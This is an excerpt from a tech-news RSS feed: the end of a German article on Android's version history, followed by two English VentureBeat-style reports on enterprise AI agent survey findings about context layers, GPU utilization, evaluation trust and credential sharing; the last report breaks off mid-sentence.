<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Android Oreo erweiterte Googles mobiles Betriebssystem um diverse bedeutende Funktionen." title="Android Oreo erweiterte Googles mobiles Betriebssystem um diverse bedeutende Funktionen." src="https://images.computerwoche.de/bdb/3392488/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Android Oreo erweiterte Googles mobiles Betriebssystem um diverse bedeutende Funktionen.</p></figcaption></figure><p class="imageCredit">
					Foto: JR Raphael | IDG</p></div>




<h2 class="wp-block-heading">Android 9 Pie</h2>



<p><a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a>-Version 9, auch bekannt unter dem Codenamen Pie, brachte im August 2018 frischen Wind in Googles Mobile-Ökosystem. Die wesentlichste Änderung war dabei ein <a href="https://www.computerworld.com/article/1689846/android-p-gesture-navigation.html" title="hybrides Gesten-Button-Navigationssystem" target="_blank">hybrides Gesten-Button-Navigationssystem</a>, das die traditionellen Navigationstasten mit einem großen, multifunktionalen “Home Button” ersetzte.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Alles neu machte Android 9 - zumindest in Sachen Bedienung." title="Alles neu machte Android 9 - zumindest in Sachen Bedienung." src="https://images.computerwoche.de/bdb/3392489/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Alles neu machte Android 9 – zumindest in Sachen Bedienung.</p></figcaption></figure><p class="imageCredit">
					Foto: JR Raphael | IDG</p></div>




<p><a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> Pie enthielt allerdings auch einige bemerkenswerte neue Productivity-Funktionen, beispielsweise ein universelles System, um mit vorgeschlagenen Antworten auf Nachrichten zu reagieren oder ein intelligenteres Energiemanagement. Erwähnenswert sind bei dieser Android-Version zudem zahlreiche Optimierungen in Sachen Datenschutz und Sicherheit.</p>



<h2 class="wp-block-heading">Android Version 10</h2>



<p>Im September 2019 ereilte der nächste Umschwung auch die Backwerk-affine Nomenklatur: <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> 10 war die erste Version, die <a href="https://www.computerworld.com/article/1657690/android-10-end-of-whimsy.html" title="ausschließlich mit einer Zahl" target="_blank">ausschließlich mit einer Zahl</a> bezeichnet wird. Dazu passend brachte die Betriebssystem-Software auch eine völlig neu gestaltete Oberfläche mit sich, die ab diesem Zeitpunkt vollständig auf Wischbewegungen ausgelegt war.</p>



<p>Zu den wichtigen Verbesserungen, die <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> 10 darüber hinaus an Bord hatte, gehörten ein aktualisiertes App-Berechtigungssystem mit tioefergehenden Kontrollmöglichkeiten, eine “Darkmode”-Option, ein Fokusmodus sowie die Möglichkeit, abzuspielende Mediendateien automatisch mit Untertiteln zu versehen.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Speziell in Sachen Standortdaten brachte Android 10 eine dringend nötige Nuancierung." title="Speziell in Sachen Standortdaten brachte Android 10 eine dringend nötige Nuancierung." src="https://images.computerwoche.de/bdb/3392490/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Speziell in Sachen Standortdaten brachte Android 10 eine dringend nötige Nuancierung.</p></figcaption></figure><p class="imageCredit">
					Foto: JR Raphael | IDG</p></div>




<h2 class="wp-block-heading">Android Version 11</h2>



<p>Mit <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> Version 11 veröffentlichte Google im September 2020 ein umfassendes Software-Update, das zahlreiche Neuerungen brachte. Die wichtigste Änderung drehte sich <a href="https://www.computerworld.com/article/1629241/android-11-additions.html" title="um das Thema Datenschutz" target="_blank">um das Thema Datenschutz</a>: Das mit <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> 10 eingeführte Berechtigungssystem wurde um die Möglichkeit erweitert, Apps einmaligen Zugriff auf Standortdaten, Kamera oder Mikrofon zu gewähren.</p>



<p>Mit <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> 11 erschwerte Google außerdem, dass Apps den Standort der Nutzer im Hintergrund ermitteln können und führte eine Funktion ein, die Apps automatisch Berechtigungen entzieht, wenn diese für längere Zeit nicht genutzt wurden. Auf Interface-Ebene bot Android 11 außerdem einen vereinheitlichten Media Player, eine Benachrichtigungshistorie, die Möglichkeit, alle verbundenen Geräte in einer Übersicht anzuzeigen sowie eine native Screen-Recording-Funktion.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Der neue Einheits-Media-Player in Android 11." title="Der neue Einheits-Media-Player in Android 11." src="https://images.computerwoche.de/bdb/3392491/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Der neue Einheits-Media-Player in Android 11.</p></figcaption></figure><p class="imageCredit">
					Foto: JR Raphael | IDG</p></div>




<h2 class="wp-block-heading">Android Version 12</h2>



<p>Die finale Version von <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> 12 präsentierte Google pünktlich zur Markteinführung seiner Smartphones <a href="https://www.computerwoche.de/article/2809810/google-mutter-verdient-kraeftig.html" title="Pixel 6 und Pixel 6 Pro" target="_blank">Pixel 6 und Pixel 6 Pro</a> im Oktober 2021. Die wesentlichen Fortschritte waren bei dieser <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a>-Version direkt sichtbar: Sie bot die wohl größte Interface-Überarbeitung bei Android seit Lollipop und führte einen aktualisierten Design-Standard namens “Material You” ein. Das fußt auf der Idee, das Erscheinungsbild des Betriebssystems mit dynamisch generierten Themes an die individuelle “Farbwelt” des Benutzers anzupassen. </p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Android 12 brachte einen völlig neuen frischen Look mit - dem " title="Android 12 brachte einen völlig neuen frischen Look mit - dem " src="https://images.computerwoche.de/bdb/3392492/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Android 12 brachte einen völlig neuen frischen Look mit – dem “Material You”-Designstandard sei Dank.</p></figcaption></figure><p class="imageCredit">
					Foto: JR Raphael | IDG</p></div>




<p>Davon abgesehen hatte <a class="idgGlossaryLink" href="https://www.computerwoche.de/mobile/" target="_blank">Android</a> 12 auch ein (<a title="lange überfälliges" href="https://www.computerworld.com/article/1639159/android-missed-opportunity.html" target="_blank">lange überfälliges</a>) neues Widget-System sowie eine Reihe grundlegender Verbesserungen in den Bereichen Leistung, Sicherheit und Datenschutz zu bieten. In diesem Zuge erweiterte Google sein Betriebssystem auch um einen isolierten Bereich, der KI-Funktionen auch ohne Netzwerkzugriff und Datenexposition ermöglicht.</p>



<h2 class="wp-block-heading">Android Version 13</h2>



<p>Mit <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> 13 veröffentlichte Google im August 2022 eine der bislang ungewöhnlichsten Android-Versionen: Sie ist eines der ehrgeizigsten Android-Updates überhaupt – beinhaltet gleichzeitig aber auch vornehmlich subtile Änderungen. Für das Nutzererlebnis spielte dabei auch eine tragende Rolle, auf welchem Device Android 13 installiert wurde. Für <a href="https://www.computerwoche.de/k/tablet-pc,3453" target="_blank" class="idgGlossaryLink">Tablets</a> und faltbare Smartphones führte <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> 13 ein gänzlich neues Interface-Design ein – mit dem Ziel, ein verbessertes Benutzererlebnis auf größeren Bildschirmen zu realisieren. Das schlug sich auch in einem auf Multitasking ausgelegten, aktualisierten Split-Screen-Modus und einer Taskbar im Chrome-OS-Stil nieder. Darüber hinaus schuf Android 13 auch die Vorraussetzung dafür, dass Pixel-<a href="https://www.computerwoche.de/k/tablet-pc,3453" target="_blank" class="idgGlossaryLink">Tablets</a> als <a href="https://www.computerworld.com/article/1699827/google-assistant-working-from-home.html" title="stationäres Smart Display" target="_blank">stationäres Smart Display</a> fungieren konnten.</p>



<p>Mit Blick auf Smartphones war der Release von <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> 13 weit weniger bedeutsam. Neben einigen kleineren visuellen Optimierungen führte diese Android-Version ein erweitertes System für die Zwischenablage ein, eine native Funktion, um QR-Codes zu scannen, sowie weitere Optimierungen in den Bereichen Datenschutz, Sicherheit und Leistung.</p>



<h2 class="wp-block-heading">Android Version 14</h2>



<p>Nach achtmonatiger Entwicklungsphase präsentierte Google Anfang Oktober 2023 Android 14 – zeitgleich zur Vorstellung seiner <a href="https://www.computerwoche.de/article/2829090/google-pixel-8-pro-im-business.html" title="Pixel-8-Smartphones" target="_blank">Pixel-8-Smartphones</a>. Auch diese <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a>-Version kam eher subtil um die Ecke: Sie brachte zum Beispiel ein neues System zum Einsatz, um Text zwischen Apps im Drag-und-Drop-Verfahren auszutauschen, sowie native Anpassungsmöglichkeiten für den Android-Sperrbildschirm. Zudem durften die Nutzer mit Android 14 auf ein integriertes Dashboard zugreifen, um sämtliche ihrer Gesundheits- und Fitness-Daten zu managen.</p>



<p>Darüber hinaus enthält diese <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a>-Version eine Reihe wichtiger Erweiterungen für die Barrierefreiheit – etwa eine On-Demand-Lupe, verbesserten Support für Hörgeräte sowie die Möglichkeit, eingehende Nachrichten über den Kamerablitz zu visualisieren. Die Benutzer von Pixel 8 und Pixel 8 Pro durften mit Android 14 auch erstmals und exklusiv Googles KI-basierten Wallpaper Creator austesten.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Der KI-basierte Wallpaper Generator in Android 14 liefert interessante Ergebnisse." title="Der KI-basierte Wallpaper Generator in Android 14 liefert interessante Ergebnisse." src="https://images.computerwoche.de/bdb/3392493/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Der KI-basierte Wallpaper Generator in Android 14 liefert interessante Ergebnisse.</p></figcaption></figure><p class="imageCredit">
					Foto: JR Raphael | IDG</p></div>




<h2 class="wp-block-heading">Android Version 15</h2>



<p>Technisch betrachtet hat Google Android 15 bereits <a href="https://android-developers.googleblog.com/2024/09/android-15-is-released-to-aosp.html" target="_blank" rel="noreferrer noopener">im September 2024</a> veröffentlicht – allerdings tauchte die neue Android-Version erst <a href="https://blog.google/products/android/android-15/" target="_blank" rel="noreferrer noopener">ab Mitte Oktober</a> auf den hauseigenen Pixel-Geräten auf.</p>



<p>Mit Android 15 hält eine ganze <a href="https://www.computerworld.com/article/3564973/android-15-features-google-pixel-phone.html" target="_blank">eine Reihe bemerkenswerter neuer Funktionen</a> Einzug. Darunter eine „Private Space“-Option, die es ermöglicht, sensible Applikationen beziehungsweise Inhalte mit einer zusätzlichen Authentifizierungsebene auszustatten. Davon abgesehen verbessert Version 15 auch die mit Android 13 eingeführten Multitasking-Systeme weiter: Die Android Taskbar ist jetzt optional dauerhaft präsent. Außerdem lassen sich bestimmte App-Kombinationen ab Version 15 mit einem Fingertipp im Split-Screen-Modus aufrufen.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2025/03/07-android-15-private-space.jpg?quality=50&amp;strip=all&amp;w=1024" alt="private space settings in android 15" class="wp-image-3852845" width="1024" height="1025" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">Mit „Private Space“ sind bestimmte Apps ausschließlich über einen geschützten (und optional auch versteckten) Bereich abrufbar.</figcaption></figure><p class="imageCredit">JR Raphael / Foundry</p></div>



<p>Weitere nennenswerte Neuerungen von Android 15 sind ein neu designtes Lautstärkeregelungs-Panel sowie ein (Pixel-exklusives) „Adaptive Vibration“-Feature, dass die Vibrationsintensität an der jeweils aktuellen Umgebung ausrichtet.</p>



<h2 class="wp-block-heading">Android Version 16</h2>



<p>Mit dem Jahr 2025 hat Google beschlossen, seinen bisherigen Android-Upgrade-Zyklus aufzubrechen: Beginnend mit der <a href="https://developer.android.com/about/versions/16?hl=de" target="_blank" rel="noreferrer noopener">Veröffentlichung von Version 16</a> sollen künftig pro Jahr zwei Android-Versionen erscheinen. Den ersten Teil dieses Versprechens hat Google bereits mit der Veröffentlichung von Android 16 im Juni 2025 umgesetzt.</p>



<p>Zu den wichtigsten neuen Funktionen von Android 16 zählen unter anderem <a href="https://www.androidauthority.com/android-16-live-notifications-3518375/" target="_blank" rel="noreferrer noopener">Live-Updates</a> – eine neue Art von Benachrichtigungen, die ähnlich funktionieren wie die Live-Aktivitäten bei iOS. Darüber hinaus verspricht Version 16 des Google-Mobile-Betriebssystems auch <a href="https://www.androidauthority.com/android-16-quick-settings-redesign-hands-on-3534161/" target="_blank" rel="noreferrer noopener">eine Reihe von Verbesserungen</a> für die Benutzeroberfläche, <a href="https://www.androidauthority.com/android-desktop-view-3533755/" target="_blank" rel="noreferrer noopener">ein besseres Desktop-Erlebnis</a> sowie Support für striktere Netzwerksicherheitsregeln.   </p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2025/03/android-version-16-beta-app-adapting.jpg?quality=50&amp;strip=all&amp;w=1024" alt="android version 16 beta app adapting for screen width on two different devices" class="wp-image-3851568" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">Mit Android 16 sollen Android-Apps sich endlich auch im Großformat ordentlich präsentieren – statt etwa auf Tablets ein Smartphone zu „simulieren“.</figcaption></figure><p class="imageCredit">Google</p></div>



<h2 class="wp-block-heading">Android Version 17</h2>



<p>Die erste Beta-Version von Android 17 wurde von Google Mitte Februar 2026 veröffentlicht. Eine <a href="https://android-developers.googleblog.com/2026/02/the-second-beta-of-android-17.html" target="_blank" rel="noreferrer noopener">zweite Beta</a> folgte bereits wenig später. Die finale Version des aktuellen Google Mobil-Betriebssystems wurde Mitte Juni 2026 veröffentlicht. Ein Fokus liegt bei Android 17 auf einer optimierten User Experience für faltbare Devices und Tablets, ein weiterer auf KI.</p>



<figure class="wp-block-embed is-type-rich is-provider-x wp-block-embed-x"><div class="wp-block-embed__wrapper youtube-video">
<blockquote class="twitter-tweet" data-width="500" data-dnt="true"><p lang="en" dir="ltr">🖐 Five things you need to know about Android 17: <br><br>1️⃣ The intelligence system<br>2️⃣ Adaptive-first<br>3️⃣ Performance improvements<br>4️⃣ Permissions through pickers<br>5️⃣ Pro-quality camera &amp; media<br><br>Read the details → <a href="https://t.co/jiij02K3Gr">https://t.co/jiij02K3Gr</a> <a href="https://t.co/X7QcuvBJdo">pic.twitter.com/X7QcuvBJdo</a></p>— Android Developers (@AndroidDev) <a href="https://x.com/AndroidDev/status/2069767498199708126?ref_src=twsrc%5Etfw">June 24, 2026</a></blockquote>
</div></figure>



<p>(fm)</p>



<p><strong>Dieser Artikel ist <a href="https://www.computerworld.com/article/1714347/android-versions-a-living-history-from-1-0-to-today.html" target="_blank">im Original</a> bei unserer Schwesterpublikation Computerworld.com erschienen.</strong></p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[57% of enterprises have watched AI agents be confidently wrong. The fix is an agentic context layer, but who has one?]]></title>
<description><![CDATA[An enterprise AI agent answers with total confidence, but the number is wrong. Nobody catches it until someone traces it back to a stale metric definition or a document the retrieval system never pulled. The model did not fail. The context it was given did.In the past six months, 57% of enterpris...]]></description>
<link>https://tsecurity.de/de/3660872/it-nachrichten/57-of-enterprises-have-watched-ai-agents-be-confidently-wrong-the-fix-is-an-agentic-context-layer-but-who-has-one/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3660872/it-nachrichten/57-of-enterprises-have-watched-ai-agents-be-confidently-wrong-the-fix-is-an-agentic-context-layer-but-who-has-one/</guid>
<pubDate>Fri, 10 Jul 2026 23:47:15 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>An enterprise AI agent answers with total confidence, but the number is wrong. Nobody catches it until someone traces it back to a stale metric definition or a document the retrieval system never pulled. The model did not fail. The context it was given did.</p><p>In the past six months, 57% of enterprises traced a confident but wrong AI agent answer to missing or inconsistent business context, and 31% said it happened more than once, according to a VB Pulse June 2026 survey of 101 qualified enterprises with more than 100 employees.</p><p>The reason is not hard to find. Retrieval over documents is the default way agents get business context for 38% of enterprises, nearly double the next closest approach. The way most enterprises choose a retrieval system compounds the problem. Ease of ingestion and operational simplicity lead the selection criteria, with retrieval accuracy running behind both. The accuracy problem only shows up after the system is already live.</p><p>There is a known fix for this, a governed context layer every agent reads from instead of guessing. Vendors are racing to roll out context platforms while most enterprises are still figuring out what it is.</p><h2>75% don't have an agentic context layer yet</h2><p>The context layer is meant to be a shared model of what business data actually means, built once and referenced consistently instead of re-derived by every agent that touches it. </p><p>The VentureBeat research shows the enterprise response to that idea is broad but unfinished. Twenty-five percent of respondents run one in production. Thirty-four percent are building one right now. The remaining 41% have not started.</p><p>Among companies already building or running a governed context layer, 78% report a confident-wrong failure — an AI agent that answered with total certainty and was still wrong. Among companies with no plans to build a layer, only 20% report the same thing. Companies that already got burned are far more likely to be building the fix. Companies that haven't been burned yet see no urgency.</p><h2>What governed context looks like when someone actually builds one</h2><p>Every major data and AI platform vendor is now building some version of this layer, and they are not converging on the same architecture. </p><ul><li><p><a href="https://venturebeat.com/data/sql-query-logs-hold-the-context-ai-agents-need-to-stop-hallucinating-joins">DataHub</a> is treating catalog metadata and years of analyst query behavior as a knowledge source, then keeping it current as a living system rather than a static wiki. </p></li><li><p>Microsoft's<a href="https://venturebeat.com/data/enterprise-ai-agents-keep-operating-from-different-versions-of-reality"> Fabric IQ</a> is building a business ontology that any agent, not just Microsoft's own, can query over MCP. </p></li><li><p><a href="https://venturebeat.com/data/ai-agents-need-context-everywhere-they-run-even-where-the-cloud-cant-follow">Couchbase</a> is pushing agent memory and context retrieval down to the edge, arguing the operational database is a more natural home for it than a search or analytics layer bolted on after the fact. </p></li><li><p>Pinecone's<a href="https://venturebeat.com/data/the-rag-era-is-ending-for-agentic-ai-a-new-compilation-stage-knowledge-layer-is-what-comes-next"> Nexus</a> is compiling structural logic into the metadata layer ahead of runtime, betting that agents need pre-built structure more than they need faster search.</p></li><li><p>Snowflake runs a two-layer system,<a href="https://venturebeat.com/data/ai-agents-keep-giving-confident-wrong-answers-the-context-layer-is-enterprise-ais-next-production-problem"> Horizon Context</a> for customer-managed definitions and Cortex Sense for context the platform infers on its own. </p></li><li><p>Oracle's<a href="https://venturebeat.com/data/oracle-converges-the-ai-data-stack-to-give-enterprise-agents-a-single"> Unified Memory Core</a> takes the opposite approach, folding vector, graph and relational data into one transactional engine so there is no sync layer left to go stale. </p></li><li><p>Google's<a href="https://venturebeat.com/data/the-modern-data-stack-was-built-for-humans-asking-questions-google-just-rebuilt-its-for-agents-taking-action"> Knowledge Catalog</a> mines query logs and usage patterns to curate semantic context automatically.</p></li><li><p>AWS's<a href="https://venturebeat.com/data/aws-enters-the-context-layer-race-with-a-graph-that-learns-from-agents-not-manual-curation"> Context</a> service makes the same bet, a knowledge graph that gets smarter from how agents actually use it rather than from manual re-curation.</p></li></ul><h2>Analysts converge on one diagnosis</h2><p>The vendor approaches differ. What analysts and practitioners have told VentureBeat about the underlying problem, across a run of interviews this year, does not.</p><p>When<a href="https://venturebeat.com/data/sql-query-logs-hold-the-context-ai-agents-need-to-stop-hallucinating-joins"> DataHub's context layer push</a> landed this spring, Constellation Research VP and principal analyst Michael Ni framed the stakes in blunt terms. "Whoever controls runtime context controls the AI decision layer for enterprise data," Ni said. He was equally direct about how far any single product actually gets a buyer. "Vector memory isn't business meaning, business meaning isn't governance and governance isn't execution," Ni said.</p><p>In the same interview, BARC analyst Kevin Petrie pointed to a narrower but concrete gap. Most context platforms concentrate on structured tables, he said, which give agents trusted facts but miss the harder, messier context locked in documents and unstructured content, exactly the material a business actually runs on day to day.</p><p>Stephanie Walter, practice leader for AI Stack at HyperFRAME Research, made a related point earlier this year when VentureBeat asked her about<a href="https://venturebeat.com/data/context-architecture-is-replacing-rag-as-agentic-ai-pushes-enterprise-retrieval-to-its-limits"> enterprise context fragmentation</a>. </p><p>"The market is converging on the same conclusion," Walter said. "Agents don't just need more tokens or better models. They need governed, current, low-latency context." She made a similar case in an earlier review of<a href="https://venturebeat.com/data/the-rag-era-is-ending-for-agentic-ai-a-new-compilation-stage-knowledge-layer-is-what-comes-next"> Pinecone's Nexus launch</a>, careful not to overstate how new any of this is. Nexus, she said, "shifts knowledge work from runtime chaos to pre-compiled structure. But it's an evolution of RAG architecture, not a complete reinvention." </p><p>Gartner's Arun Chandrasekaran, reviewing the same launch, offered the more forward-looking read. Agentic AI, he said, is moving from pure information retrieval toward a reasoning architecture, one where long context works as short-term memory and a vector database functions as deep storage underneath it.</p><p>The fragmentation problem shows up hardest at the practitioner level, where separate tools for retrieval, memory and access control were never built to agree with each other. Steven Dickens, CEO and principal analyst at HyperFRAME Research, put it bluntly after <a href="https://venturebeat.com/data/oracle-converges-the-ai-data-stack-to-give-enterprise-agents-a-single">Oracle's AI database push</a> landed this spring. "Data teams are exhausted by fragmentation fatigue," Dickens said. "Managing a separate vector store, graph database and relational system just to power one agent is a DevOps nightmare." </p><p>Matt Kimball at Moor Insights and Strategy, in that same story, put the production reality more simply. Getting an agent working is not the hard part, he said. The struggle is running it in production, where the goal becomes removing the distance between data and execution rather than adding another layer on top of it.</p><h2>What this means for enterprises</h2><p>Here's what this adds up to for enterprises building on this layer.</p><p><b>Retrieval alone will not close the context gap.</b> RAG is the default source for context in most enterprises today, and it is also the layer most closely associated with the confident-wrong-answer failure. Adding more documents or a bigger index does not fix a definition that is inconsistent across systems.</p><p><b>The semantic context layer is where the budget is actually moving, even where it hasn't shipped. </b>Fifty-eight percent of enterprises are already engaged — building or in production — but only 25% have actually gotten a layer live. That gap shows where enterprises have decided to spend, not where they've arrived.</p><p><b>No single vendor owns the architecture yet, and that is likely to stay true for a while.</b> Enterprises evaluating this layer should expect to integrate rather than pick a single winner, at least for the next several quarters.</p><p><b>The buying decision is happening this year, and it is concentrated among the companies already burned by it.</b> Fifty-seven percent of enterprises plan to switch or add a retrieval or context platform within the next twelve months. That intent is not spread evenly. Enterprises that reported a repeat confident-wrong failure plan to switch or add a provider at roughly 81%, against 32% among enterprises that never hit the problem. The companies shopping for new context tooling right now are largely the ones whose agents already got it wrong. </p><p>The agents are already running. The context underneath most of them is still being built, and the vendor selling the fix is being chosen this year.</p><p><i>This data will be part of a broader conversation at </i><a href="https://venturebeat.com/vbtransform2026"><i>VB Transform 2026</i></a><i> on July 14 and 15 in Menlo Park: the context gap enterprises are racing to close, and which of the emerging approaches — governed semantic layers, hybrid retrieval, provider-native bundles — actually holds up in production.</i></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Wall Street is debating the AI buildout. Enterprises just answered: 86% say their GPUs run at half capacity or less]]></title>
<description><![CDATA[Enterprise companies are running AI agents ahead of the controls needed to manage them — and they deployed that way knowingly. That is the central finding from VentureBeat Research's June survey of 573 technical leaders at companies with 100 or more employees, fielded across five parallel surveys...]]></description>
<link>https://tsecurity.de/de/3660798/it-nachrichten/wall-street-is-debating-the-ai-buildout-enterprises-just-answered-86-say-their-gpus-run-at-half-capacity-or-less/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3660798/it-nachrichten/wall-street-is-debating-the-ai-buildout-enterprises-just-answered-86-say-their-gpus-run-at-half-capacity-or-less/</guid>
<pubDate>Fri, 10 Jul 2026 22:48:13 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Enterprise companies are running AI agents ahead of the controls needed to manage them — and they deployed that way knowingly. That is the central finding from VentureBeat Research's June survey of 573 technical leaders at companies with 100 or more employees, fielded across five parallel surveys of the agentic stack. </p><p>Enterprises are now retrofitting to catch up with their own standards, and they are budgeting for it: Roughly six in 10 enterprises plan to switch or add vendors in each of five control layers within the next 12 months, and roughly a third — depending on the layer — plan to move within the quarter, the research finds.</p><p>There are five main layers where enterprises are building: identity for agents (which agent is allowed to do what, under whose credentials); evaluation of agent output (whether the work is any good); cost telemetry (what each agent costs to run); the context layer (the business data and definitions agents draw on to answer); and the orchestration control plane (the software that coordinates multi-step agent work).</p><p>Enterprises are already paying the price for deploying agents ahead of adequate control functions. Fifty-four percent of companies <a href="https://venturebeat.com/security/shared-api-keys-expose-ai-agent-fleets-venturebeat-research">had an agent security incident or near-miss caught before harm</a> in the past 12 months. Twenty-seven percent exercise only reactive control of agent spend — they learn what an agent costs when the invoice arrives, with no per-agent budget or ceiling in place.</p><div></div><p>Here are the five findings that anchor the set — one finding per layer of the tech stack — and what the data suggests doing first in each.</p><h2>Expensive hardware is idle: 86% of GPU operators report utilization of 50% or less</h2><p>Eighty-six percent of enterprises that run their own GPUs report utilization of 50% or less. Wall Street has spent the quarter debating whether the AI buildout is overbuilt. This is buy-side measurement, from the enterprises doing the buying, and the research says the most expensive hardware in buildings of these enterprises runs at no more than half its capacity.</p><p>The measurement gap compounds it: A minority 44% rigorously track what their AI compute actually costs and returns. Everyone else is only estimating. And the enterprise shopping process continues regardless: 45% of these enterprises say the emerging compute option they are most likely to evaluate in the next 12 months is an AI-specialized cloud (CoreWeave, Lambda, Crusoe, Nebius). However, under 2% of these enterprises report using one of these neoclouds today. </p><p>Moreover, roughly one in three companies appears to be considering a hedge against Nvidia: Asked which emerging compute option they are most likely to evaluate in the next 12 months, 32% of enterprises named non-Nvidia accelerators (AWS Trainium, Google TPUs, AMD), while 28% named next-generation Nvidia GPUs. The data suggests that enterprises should measure the utilization and per-workload cost of the GPUs they already own before committing budget to new compute — whether that's an AI-specialized cloud contract, new accelerators, or more GPUs. </p><h2>Most deployed "agents" do single-prompt work: 71% say a quarter or fewer complete multi-step tasks on their own</h2><p>Seventy-one percent of enterprises say a quarter or fewer of their deployed "agents" can complete multi-step work on their own; the rest are single-prompt chatbots. Only 10% say true agents are the majority of what they run. To be sure, the respondents reported that they are in a position to know these things: 81% said they recommend or decide AI purchases at their companies.</p><p>That finding — that most agents are actually just chatbots in trenchcoats — lands amid adoption claims across the industry running well ahead of what enterprises are actually running. Gartner <a href="https://www.gartner.com/en/newsroom/press-releases/2025-08-26-gartner-predicts-40-percent-of-enterprise-apps-will-feature-task-specific-ai-agents-by-2026-up-from-less-than-5-percent-in-2025">predicted</a> 40% of enterprise applications will be integrated with task-specific AI agents by the end of 2026, up from less than 5% in 2025. It also warned that the most common misconception is referring to these AI assistants as agents, a misunderstanding known as "agentwashing."</p><p>Meanwhile, Zapier's enterprise <a href="https://zapier.com/blog/ai-agents-survey/">survey</a> said 72% reported deploying or testing autonomous agents; and Writer's 2026 <a href="https://writer.com/blog/enterprise-ai-adoption-2026/">survey</a> has 97% of executives saying their company deployed AI agents in the past year. </p><p>Those surveys asked whether companies have deployed something called an AI agent, and companies said yes. Our survey asked the people running those deployments a harder question: Of the agents you have in production, how many can complete a multi-step task without a person driving each step? The gap matters for two practical reasons. First, the inflated adoption figures are the benchmark boards and vendors use to pressure technical leaders into moving faster — and this data says the real bar is far lower than the headlines suggest. Second, the label determines the bill: A single-prompt chatbot with a human reading every answer needs none of the identity, evaluation, and cost controls this report covers, while a true multi-step agent needs all of them. </p><h2>66% let agents push to production on automated evals alone — or are engineering toward it. 5% fully trust those evals</h2><p>Two-thirds of enterprises fall into one of two camps: 34% already allow an AI agent to push a code or system change to production based on automated evaluation results alone, with no human reviewing it, and another 33% are actively engineering their pipelines to allow that within the next 12 months. Only five percent fully trust the automated evaluations that would make that decision.</p><p>The distrust is earned. Half of enterprises shipped an agent that passed internal evaluations and then caused a customer-facing failure in the past year; a quarter watched it happen more than once. Asked to name the biggest weakness in their current evaluations, more enterprises chose “poor alignment with real-world outcomes” than any other answer — 29% of respondents.</p><p>And most of the checking happens before an agent ships, then stops. Once agents are live with real users, only 23% of enterprises run real-time quality checks on the answers those agents produce. Another 51% monitor system health only — uptime, request traces, and gateway logs — which tells them the agent is running, and nothing about whether its answers are right. The first move: Before removing human review from any workflow, test your evaluations against production outcomes rather than internal benchmarks, and instrument answer quality, not just uptime. </p><p>This finding is explored in more depth in <a href="https://venturebeat.com/orchestration/enterprise-ai-is-entering-an-evaluation-gap-agents-are-gaining-autonomy-faster-than-companies-can-verify-them">VentureBeat's related coverage of the evaluation gap</a>, which found that larger enterprises are moving faster toward zero-human deployment while also failing more often — and outlines a regression-testing framework built on production outcomes rather than internal benchmarks. </p><h2>69% run credential sharing somewhere in the agent fleet — and those companies get hit far more often</h2><p>Sixty-nine percent of companies allow agent credential sharing somewhere in their agent fleet during runtime – meaning multiple agents operating under one API key or service account. Those companies were far more likely to get hit: Organizations with credential sharing anywhere in the fleet experienced a security incident or near-miss at a 63.5% rate (47 of 74), against 40.9% (9 of 22) where every agent has its own scoped identity. </p><p>The takeaway for enterprises is this: Give every agent its own scoped identity, starting with the agents that touch production systems.</p><h2>57% traced a confident, wrong agent answer to their own missing or inconsistent business context</h2><p>Fifty-seven percent of enterprises traced at least one confident, wrong agent answer in the past six months to missing or inconsistent business context: wrong metrics, stale definitions, absent documents. Most of 